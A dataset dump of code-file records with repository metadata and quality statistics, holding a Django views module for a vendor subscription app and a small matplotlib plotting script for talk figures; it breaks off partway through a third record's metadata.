hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
44f254ddff0718eff73b4b94f45ec698474855bf
| 32,114
|
py
|
Python
|
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | null | null | null |
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | 1
|
2021-10-30T06:46:46.000Z
|
2021-10-30T06:46:57.000Z
|
aao_vender/views.py
|
sukalyan/aao_nxt_vendor
|
fde5e96b9357f097ee33d91f495be8f03a86bcbb
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render,redirect
from django.http import HttpResponseRedirect,HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import user_passes_test
from .models import *
from .utils import transection_fun,creat_remote_user,create_remote_user2
from datetime import date, timedelta
from django.utils import timezone
import pytz
import secrets
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def create_vender(request):
if request.method == "GET":
print("hello")
form={'first_name': '','last_name':'','username':'','email':''}
return render(request, 'vender/vender_form.html')
else:
first_name = request.POST.get("first_name")
last_name = request.POST.get("last_name")
username = request.POST.get("username")
email = request.POST.get("email")
mobile_no = request.POST.get("mobile_no")
password = request.POST.get("password")
email = request.POST.get("email")
confirm_password = request.POST.get("confirm_password")
if password != confirm_password:
messages.error(request, "confirm password missmatch")
form={'first_name': first_name,'last_name': last_name,'username': username,'email':email,'mobile_no':mobile_no}
return render(request, 'vender/vender_form.html',form )
if User.objects.filter(email=email.lower()).exists():
messages.error(request, "email alredy exist use another email")
form={'first_name': first_name,'last_name': last_name,'username': username,'email':email,'mobile_no':mobile_no}
return render(request, 'vender/vender_form.html',form )
if User.objects.filter(username=username).exists():
messages.error(request, "username alredy exist use another username")
form={'first_name': first_name,'last_name': last_name,'username': username,'email':email,'mobile_no':mobile_no}
return render(request, 'vender/vender_form.html',form )
else:
user = User.objects.create_user(
first_name=first_name,
last_name=last_name,
username = username,
password = password,
email = email,
is_active = True
)
user.save()
vender = Vender_Details(vd_user=user,
vd_mob_number=str(mobile_no),
vd_is_active = True,
vd_api_key= secrets.token_hex(4)+"_"+secrets.token_hex(16),
vd_api_secrate= secrets.token_hex(4)+"_"+secrets.token_hex(16)
)
vender.save()
profile_user = User.objects.get(username=username)
print(profile_user.id)
my_group = Group.objects.get(name='vender')
profile_user.groups.add(my_group)
messages.success(request, "vender created successfully.")
return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def view_vender(request):
if request.method =='GET':
#query_results = site_master.objects.all()
curent_page = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
prev_pagenumber = 1
next_page_number = 2
totaldata = users = Vender_Details.objects.filter(
vd_user__groups__name='vender').count()
query_results = Vender_Details.objects.filter(
vd_user__groups__name='vender').order_by('vd_created_at')[:pagedata_ending]
# print(query_results.query)
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def view_vender_pagination(request,page_number):
if request.method =='GET':
#query_results = site_master.objects.all()
if page_number != 1:
curent_page = int(page_number)
page_number = page_number-1
prev_pagenumber = curent_page - 1
pagedata_starting = page_number * 20
pagedata_ending = pagedata_starting + 20
else:
curent_page = 1
page_number = 1
prev_pagenumber = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
next_page_number = curent_page + 1
totaldata = users = Vender_Details.objects.filter(
vd_user__groups__name='vender').count()
query_results = Vender_Details.objects.filter(
vd_user__groups__name='vender').order_by('vd_created_at')[pagedata_starting:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def users_of_vender(request,user_id):
if request.method =='GET':
#query_results = site_master.objects.all()
curent_page = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
prev_pagenumber = 1
next_page_number = 2
user_data = User.objects.get(pk=user_id)
totaldata = Aoo_User_Details.objects.filter(
aud_vender = user_data).count()
query_results = Aoo_User_Details.objects.filter(
aud_vender = user_data).order_by('aud_created_at')[:pagedata_ending]
# print(query_results.query)
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata,
'user_id':user_id
}
return render(request, 'vender/users_of_vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def users_of_vender_pagination(request,user_id,page_number):
if request.method =='GET':
#query_results = site_master.objects.all()
if page_number != 1:
curent_page = int(page_number)
page_number = page_number-1
prev_pagenumber = curent_page - 1
pagedata_starting = page_number * 20
pagedata_ending = pagedata_starting + 20
else:
curent_page = 1
page_number = 1
prev_pagenumber = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
next_page_number = curent_page + 1
user_data = User.objects.get(pk=user_id)
totaldata = Aoo_User_Details.objects.filter(
aud_vender = user_data).count()
query_results = Aoo_User_Details.objects.filter(
aud_vender = user_data).order_by('aud_created_at')[pagedata_starting:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata,
'user_id':user_id
}
return render(request, 'vender/users_of_vender_view.html', context)
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_details(request, used_id):
if request.method == 'GET':
userexists = User.objects.filter(pk=used_id).exists()
if userexists:
user = User.objects.get(pk=used_id)
vender_details = Vender_Details.objects.filter(vd_user=user)
context = {"vender_details": vender_details
}
#print(context)
return render(request, 'vender/vender_dashboard.html', context)
else:
messages.error(request, "user not found.")
return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_credit (request, used_id):
if request.method == 'POST':
userexists = User.objects.filter(pk=used_id).exists()
if userexists:
user = User.objects.get(pk=used_id)
vender_details = Vender_Details.objects.get(vd_user=user)
credit_amount = request.POST.get("credit_amount")
credit_amount = request.POST.get("credit_amount")
credit_amount = float(credit_amount)
vender_details.vd_aao_balance = vender_details.vd_aao_balance + credit_amount
vender_details.save()
vender_details = Vender_Details.objects.filter(vd_user=user)
context = {"vender_details": vender_details
}
#print(context)
return render(request, 'vender/vender_dashboard.html', context)
else:
messages.error(request, "user not found.")
return redirect('view_vender')
else:
messages.error(request, "method not allowed")
return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_plan (request, used_id):
if request.method == 'POST':
userexists = User.objects.filter(pk=used_id).exists()
if userexists:
user = User.objects.get(pk=used_id)
vender_details = Vender_Details.objects.get(vd_user=user)
vender_plan = request.POST.get("vender_plan")
vender_details.vd_plan_subscribe = vender_plan
vender_details.save()
vender_details = Vender_Details.objects.filter(vd_user=user)
context = {"vender_details": vender_details
}
#print(context)
return render(request, 'vender/vender_dashboard.html', context)
else:
messages.error(request, "user not found.")
return redirect('view_vender')
else:
messages.error(request, "method not allowed")
return redirect('view_vender')
@login_required(login_url='/login/')
@user_passes_test(lambda u: u.is_superuser)
def vender_add_per_user_price (request, used_id):
if request.method == 'POST':
userexists = User.objects.filter(pk=used_id).exists()
if userexists:
user = User.objects.get(pk=used_id)
vender_details = Vender_Details.objects.get(vd_user=user)
per_user_price = request.POST.get("per_user_price")
per_user_price = float(per_user_price)
vender_details.vd_per_user_price = per_user_price
vender_details.save()
vender_details = Vender_Details.objects.filter(vd_user=user)
context = {"vender_details": vender_details
}
#print(context)
return render(request, 'vender/vender_dashboard.html', context)
else:
messages.error(request, "user not found.")
return redirect('view_vender')
else:
messages.error(request, "method not allowed")
return redirect('view_vender')
@login_required(login_url='/login/')
def vender_dashboard(request):
if request.method == 'GET':
userexists = User.objects.filter(pk=request.user.id).exists()
if userexists:
user = User.objects.get(pk=request.user.id)
vender_dashboard = Vender_Details.objects.filter(vd_user=user)
context = {"vender_details": vender_dashboard
}
#print(context)
return render(request, 'vender/vender_dashboard.html', context)
else:
messages.error(request, "user not found.")
return redirect('view_vender')
@login_required(login_url='/login/')
def create_aao_user(request):
if request.method == "GET":
current_user = request.user
vender_details = Vender_Details.objects.filter(vd_user=current_user)
context = {"vender_details":vender_details
}
print("hello,create_aao_user")
return render(request, 'vender/create_user_form.html',context)
else:
month=30
current_user = request.user
username = request.POST.get("username")
email_id = request.POST.get("email_id")
mobile_number = request.POST.get("mobile_number")
package_categtory = request.POST.get("package_categtory")
input_month = int(package_categtory)
print(mobile_number,type(mobile_number))
if Aoo_User_Details.objects.filter(aud_mobile_number=mobile_number,aud_vender=current_user).exists():
messages.error(request, "mobile number alredy exist extend the package")
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
data = Aoo_User_Details.objects.filter(aud_mobile_number=mobile_number,aud_vender=current_user).order_by('aud_id')[0]
#print(data,"query result---------------")
return redirect('view_aao_user_order' ,aao_user_id = data.aud_id)
if Aoo_User_Details.objects.filter(aud_email=email_id.lower(),aud_vender=current_user).exists():
messages.error(request, "email alredy exist extend the package")
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
# http://0.0.0.0:7000/aao_vender/view_aao_user_order/28
data = Aoo_User_Details.objects.filter(aud_email=email_id.lower(),aud_vender=current_user).order_by('aud_id')[0]
#print(data.aud_id,"query result---------------")
return redirect('view_aao_user_order' ,aao_user_id=data.aud_id)
#return render(request, 'vender/create_user_form.html',form )
#return render(request, 'vender/create_user_form.html',form )
if Aoo_User_Details.objects.filter(aud_username=username,aud_vender=current_user).exists():
messages.error(request, "username alredy exist extend the package")
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
data = Aoo_User_Details.objects.filter(aud_mobile_number=mobile_number,aud_vender=current_user).order_by('aud_id')[0]
#print(data,"query result---------------")
return redirect('view_aao_user_order' ,aao_user_id = data.aud_id)
else:
vender_details = Vender_Details.objects.get(vd_user=current_user)
peruser_price = vender_details.vd_per_user_price
remaining_balance = vender_details.vd_aao_balance
vender_plan = vender_details.vd_plan_subscribe
totalprice = peruser_price * input_month
duration_in_days= month * input_month
if (remaining_balance - totalprice) < 0:
messages.error(request, "you dont have enough credit ")
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
#return_status = creat_remote_user(mobile_number,username,plan)
return_status = create_remote_user2(mobile_number,username,vender_plan)
if "success" in return_status:
if(return_status['success']==False):
messages.error(request, return_status['message'])
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
else:
pass
else:
if "fail_server" in return_status:
messages.error(request, "fail_server"+return_status['fail_server'])
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
else:
message_aao = "message from aoonxt server"+str(return_status)
messages.error(request,message_aao)
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
start_date = str(timezone.now())
end_date = str(timezone.now() + timezone.timedelta(days = duration_in_days))
user_aao = Aoo_User_Details(
aud_vender=current_user,
aud_username=username,
aud_email = email_id,
aud_mobile_number = mobile_number,
aud_subsc_package = input_month,
aud_start_date= start_date,
aud_end_date= end_date
)
user_aao.save()
user_data={'username':username,
'email_id':email_id,
'mobile_number':mobile_number,
'totalmonth':input_month,
'start_date':start_date,
'end_date':end_date,
'peruser_price':peruser_price,
'remaining_balance':remaining_balance}
result_tran = transection_fun(current_user,user_aao,totalprice,user_data,vender_plan)
if result_tran:
messages.success(request, "user subscription created successfully.")
else:
messages.error(request, "something went wrong")
return redirect('create_aao_user')
@login_required(login_url='/login/')
def create_aao_user_extend_package(request):
if request.method == "POST":
month=30
current_user = request.user
username = request.POST.get("username")
email_id = request.POST.get("email_id")
mobile_number = request.POST.get("mobile_number")
package_categtory = request.POST.get("package_categtory")
input_month = int(package_categtory)
print(mobile_number,type(mobile_number))
vender_details = Vender_Details.objects.get(vd_user=current_user)
peruser_price = vender_details.vd_per_user_price
remaining_balance = vender_details.vd_aao_balance
vender_plan = vender_details.vd_plan_subscribe
totalprice = peruser_price * input_month
duration_in_days= month * input_month
if (remaining_balance - totalprice) < 0:
messages.error(request, "you dont have enough credit ")
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
#return_status = creat_remote_user(mobile_number,username,plan)
return_status = create_remote_user2(mobile_number,username,vender_plan)
if "success" in return_status:
if(return_status['success']==False):
messages.error(request, return_status['message'])
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
else:
pass
else:
if "fail_server" in return_status:
messages.error(request, "fail_server"+return_status['fail_server'])
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
else:
message_aao = "message from aoonxt server"+str(return_status)
messages.error(request,message_aao)
form={'package_categtory': input_month,'username': username,'email_id':email_id,'mobile_number':mobile_number}
return render(request, 'vender/create_user_form.html',form )
user_details = Aoo_User_Details.objects.get(aud_mobile_number=mobile_number)
last_order = Aoo_User_Order_Details.objects.filter(auod_user=user_details).order_by('-auod_created_at')[0]
last_order_end_date = last_order.auod_end_date
print(last_order_end_date,"uADIAGDJSAGDJSADJSAD-----------------",type(last_order_end_date))
if last_order_end_date >= timezone.now():
start_date = last_order_end_date + timezone.timedelta(days = 1)
else:
start_date = timezone.now()
end_date = str(start_date + timezone.timedelta(days = duration_in_days))
user_details = Aoo_User_Details.objects.get(aud_mobile_number=mobile_number)
user_details.aud_subsc_package = input_month
user_details.aud_start_date = start_date
user_details.aud_end_date = end_date
user_details.save()
user_data={'username':username,
'email_id':email_id,
'mobile_number':mobile_number,
'totalmonth':input_month,
'start_date':start_date,
'end_date':end_date,
'peruser_price':peruser_price,
'remaining_balance':remaining_balance}
result_tran = transection_fun(current_user,user_details,totalprice,user_data,vender_plan)
if result_tran:
messages.success(request, "user subscription extended successfully.")
else:
messages.error(request, "something went wrong")
return redirect('view_aao_user_order', aao_user_id=user_details.aud_id)
@login_required(login_url='/login/')
def view_aao_user(request):
if request.method =='GET':
current_user = request.user
#query_results = site_master.objects.all()
curent_page = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
prev_pagenumber = 1
next_page_number = 2
totaldata = Aoo_User_Details.objects.filter(
aud_vender=current_user).count()
query_results = Aoo_User_Details.objects.filter(
aud_vender=current_user).order_by('aud_created_at')[:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/aoo_user_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_pagination(request,page_number):
if request.method =='GET':
current_user = request.user
#query_results = site_master.objects.all()
if page_number != 1:
curent_page = int(page_number)
page_number = page_number-1
prev_pagenumber = curent_page - 1
pagedata_starting = page_number * 20
pagedata_ending = pagedata_starting + 20
else:
curent_page = 1
page_number = 1
prev_pagenumber = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
next_page_number = curent_page + 1
totaldata = Aoo_User_Details.objects.filter(
aud_vender=current_user).count()
query_results = Aoo_User_Details.objects.filter(
aud_vender=current_user).order_by('aud_created_at')[pagedata_starting:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/aoo_user_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_order(request,aao_user_id):
if request.method =='GET':
current_user = request.user
vender_details = Vender_Details.objects.filter(vd_user=current_user)
#query_results = site_master.objects.all()
curent_page = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
prev_pagenumber = 1
next_page_number = 2
aao_user = Aoo_User_Details.objects.get(
pk=aao_user_id)
aao_user_detail = Aoo_User_Details.objects.filter(
pk=aao_user_id)
totaldata = Aoo_User_Order_Details.objects.filter(
auod_user=aao_user).count()
query_results = Aoo_User_Order_Details.objects.filter(
auod_user=aao_user).order_by('auod_created_at')[:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata,
'aao_user_id':aao_user_id,
'aao_user_detail':aao_user_detail,
'vender_details':vender_details
}
return render(request, 'vender/aoo_user_order_view.html', context)
@login_required(login_url='/login/')
def view_aao_user_order_pagination(request,aao_user_id,page_number):
if request.method =='GET':
current_user = request.user
vender_details = Vender_Details.objects.filter(vd_user=current_user)
#query_results = site_master.objects.all()
if page_number != 1:
curent_page = int(page_number)
page_number = page_number-1
prev_pagenumber = curent_page - 1
pagedata_starting = page_number * 20
pagedata_ending = pagedata_starting + 20
else:
curent_page = 1
page_number = 1
prev_pagenumber = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
next_page_number = curent_page + 1
aao_user = Aoo_User_Details.objects.get(
pk=aao_user_id)
aao_user_detail = Aoo_User_Details.objects.filter(
pk=aao_user_id)
totaldata = Aoo_User_Order_Details.objects.filter(
auod_user=aao_user).count()
query_results = Aoo_User_Order_Details.objects.filter(
auod_user=aao_user).order_by('auod_created_at')[pagedata_starting:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata,
'aao_user_id':aao_user_id,
'aao_user_detail':aao_user_detail,
'vender_details':vender_details
}
return render(request, 'vender/aoo_user_order_view.html', context)
@login_required(login_url='/login/')
def vender_transection_view(request):
if request.method =='GET':
current_user = request.user
#query_results = site_master.objects.all()
curent_page = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
prev_pagenumber = 1
next_page_number = 2
totaldata = Vender_Transection_Details.objects.filter(
vtd_vender=current_user).count()
query_results = Vender_Transection_Details.objects.filter(
vtd_vender=current_user).order_by('vtd_created_at')[:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/vender_transection_view.html', context)
@login_required(login_url='/login/')
def vender_transection_view_pagination(request,page_number):
if request.method =='GET':
current_user = request.user
#query_results = site_master.objects.all()
if page_number != 1:
curent_page = int(page_number)
page_number = page_number-1
prev_pagenumber = curent_page - 1
pagedata_starting = page_number * 20
pagedata_ending = pagedata_starting + 20
else:
curent_page = 1
page_number = 1
prev_pagenumber = 1
pagedata_starting = 0
pagedata_ending = pagedata_starting + 20
next_page_number = curent_page + 1
totaldata = Vender_Transection_Details.objects.filter(
vtd_vender=current_user).count()
query_results = Vender_Transection_Details.objects.filter(
vtd_vender=current_user).order_by('vtd_created_at')[pagedata_starting:pagedata_ending]
showingdata = query_results.count()
context = {"query_results":query_results,
'totaldata':totaldata,
'curent_page':curent_page,
'pagedata_starting':pagedata_starting,
'prev_pagenumber':prev_pagenumber,
'next_page_number':next_page_number,
'showingdata':showingdata
}
return render(request, 'vender/vender_transection_view.html', context)
| 37.34186
| 130
| 0.618609
| 3,529
| 32,114
| 5.287334
| 0.052423
| 0.034836
| 0.039659
| 0.040195
| 0.906587
| 0.892867
| 0.871644
| 0.851975
| 0.837183
| 0.818961
| 0
| 0.005678
| 0.28704
| 32,114
| 859
| 131
| 37.385332
| 0.809268
| 0.029956
| 0
| 0.76412
| 0
| 0
| 0.13763
| 0.026793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0299
| false
| 0.028239
| 0.021595
| 0
| 0.121262
| 0.009967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
789633e14b61a517e645a348fb8dde9098c8686b
| 1,631
|
py
|
Python
|
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | null | null | null |
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | null | null | null |
talk_plots.py
|
firekg/Explore-vs-Teach
|
2b3b6b8fbc61e28fda75555d5bf0e068f0a9ab8a
|
[
"MIT"
] | 1
|
2018-10-28T11:52:37.000Z
|
2018-10-28T11:52:37.000Z
|
import matplotlib.pyplot as plt
import seaborn as sns
if __name__ == '__main__':
plt.figure(figsize=(6,6))
x = [0,1,2,3]
plt.xlim([-0.01, 3.01])
xlabels = ['0','1','2','3']
plt.xticks(x, xlabels)
plt.ylim([-0.01, 1.01])
plt.xlabel("Number of observations", fontsize=20)
plt.ylabel("Exploration performance", fontsize=20)
plt.savefig('../talk/talk_blank_perf.pdf')
plt.figure(figsize=(6,6))
x = [0,1,2,3]
ye = [0.5, 0.75, 0.5, 0.5]
yt = [0.5, 0.75, 1, 1]
plt.plot(x, ye, 'r-')
plt.xlim([-0.01, 3.01])
xlabels = ['0','1','2','3']
plt.xticks(x, xlabels)
plt.ylim([-0.01, 1.01])
plt.xlabel("Number of observations", fontsize=20)
plt.ylabel("Exploration performance", fontsize=20)
plt.savefig('../talk/talk_exploration_perf.pdf')
plt.figure(figsize=(6,6))
x = [0,1,2,3]
ye = [0.5, 0.75, 1, 1]
yt = [0.5, 0.75, 1, 1]
plt.plot(x, ye, 'r-')
plt.xlim([-0.01, 3.01])
xlabels = ['0','1','2','3']
plt.xticks(x, xlabels)
plt.ylim([-0.01, 1.01])
plt.xlabel("Number of observations", fontsize=20)
plt.ylabel("Teaching performance", fontsize=20)
plt.savefig('../talk/talk_teaching_perf.pdf')
plt.figure(figsize=(6,6))
x = [0,1,2,3]
ye = [0.5, 0.75, 0.5, 0.5]
yt = [0.5, 0.75, 1, 1]
plt.hold(True)
plt.plot([0,1], [0,1], 'k:', alpha=.5)
plt.plot(ye, yt, 'r-')
plt.hold(False)
plt.xlim([-0.01, 1.01])
plt.ylim([-0.01, 1.01])
plt.xlabel("Exploration performance", fontsize=20)
plt.ylabel("Teaching performance", fontsize=20)
plt.savefig('../talk/talk_evst.pdf')
| 30.203704
| 54
| 0.56591
| 281
| 1,631
| 3.231317
| 0.177936
| 0.022026
| 0.114537
| 0.030837
| 0.842511
| 0.811674
| 0.809471
| 0.809471
| 0.785242
| 0.785242
| 0
| 0.115975
| 0.201717
| 1,631
| 53
| 55
| 30.773585
| 0.581413
| 0
| 0
| 0.714286
| 0
| 0
| 0.19252
| 0.068056
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.040816
| 0
| 0.040816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78cd9f5d5b4739179dfe8dddba7f06b40d2b6a22
| 72,106
|
py
|
Python
|
infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
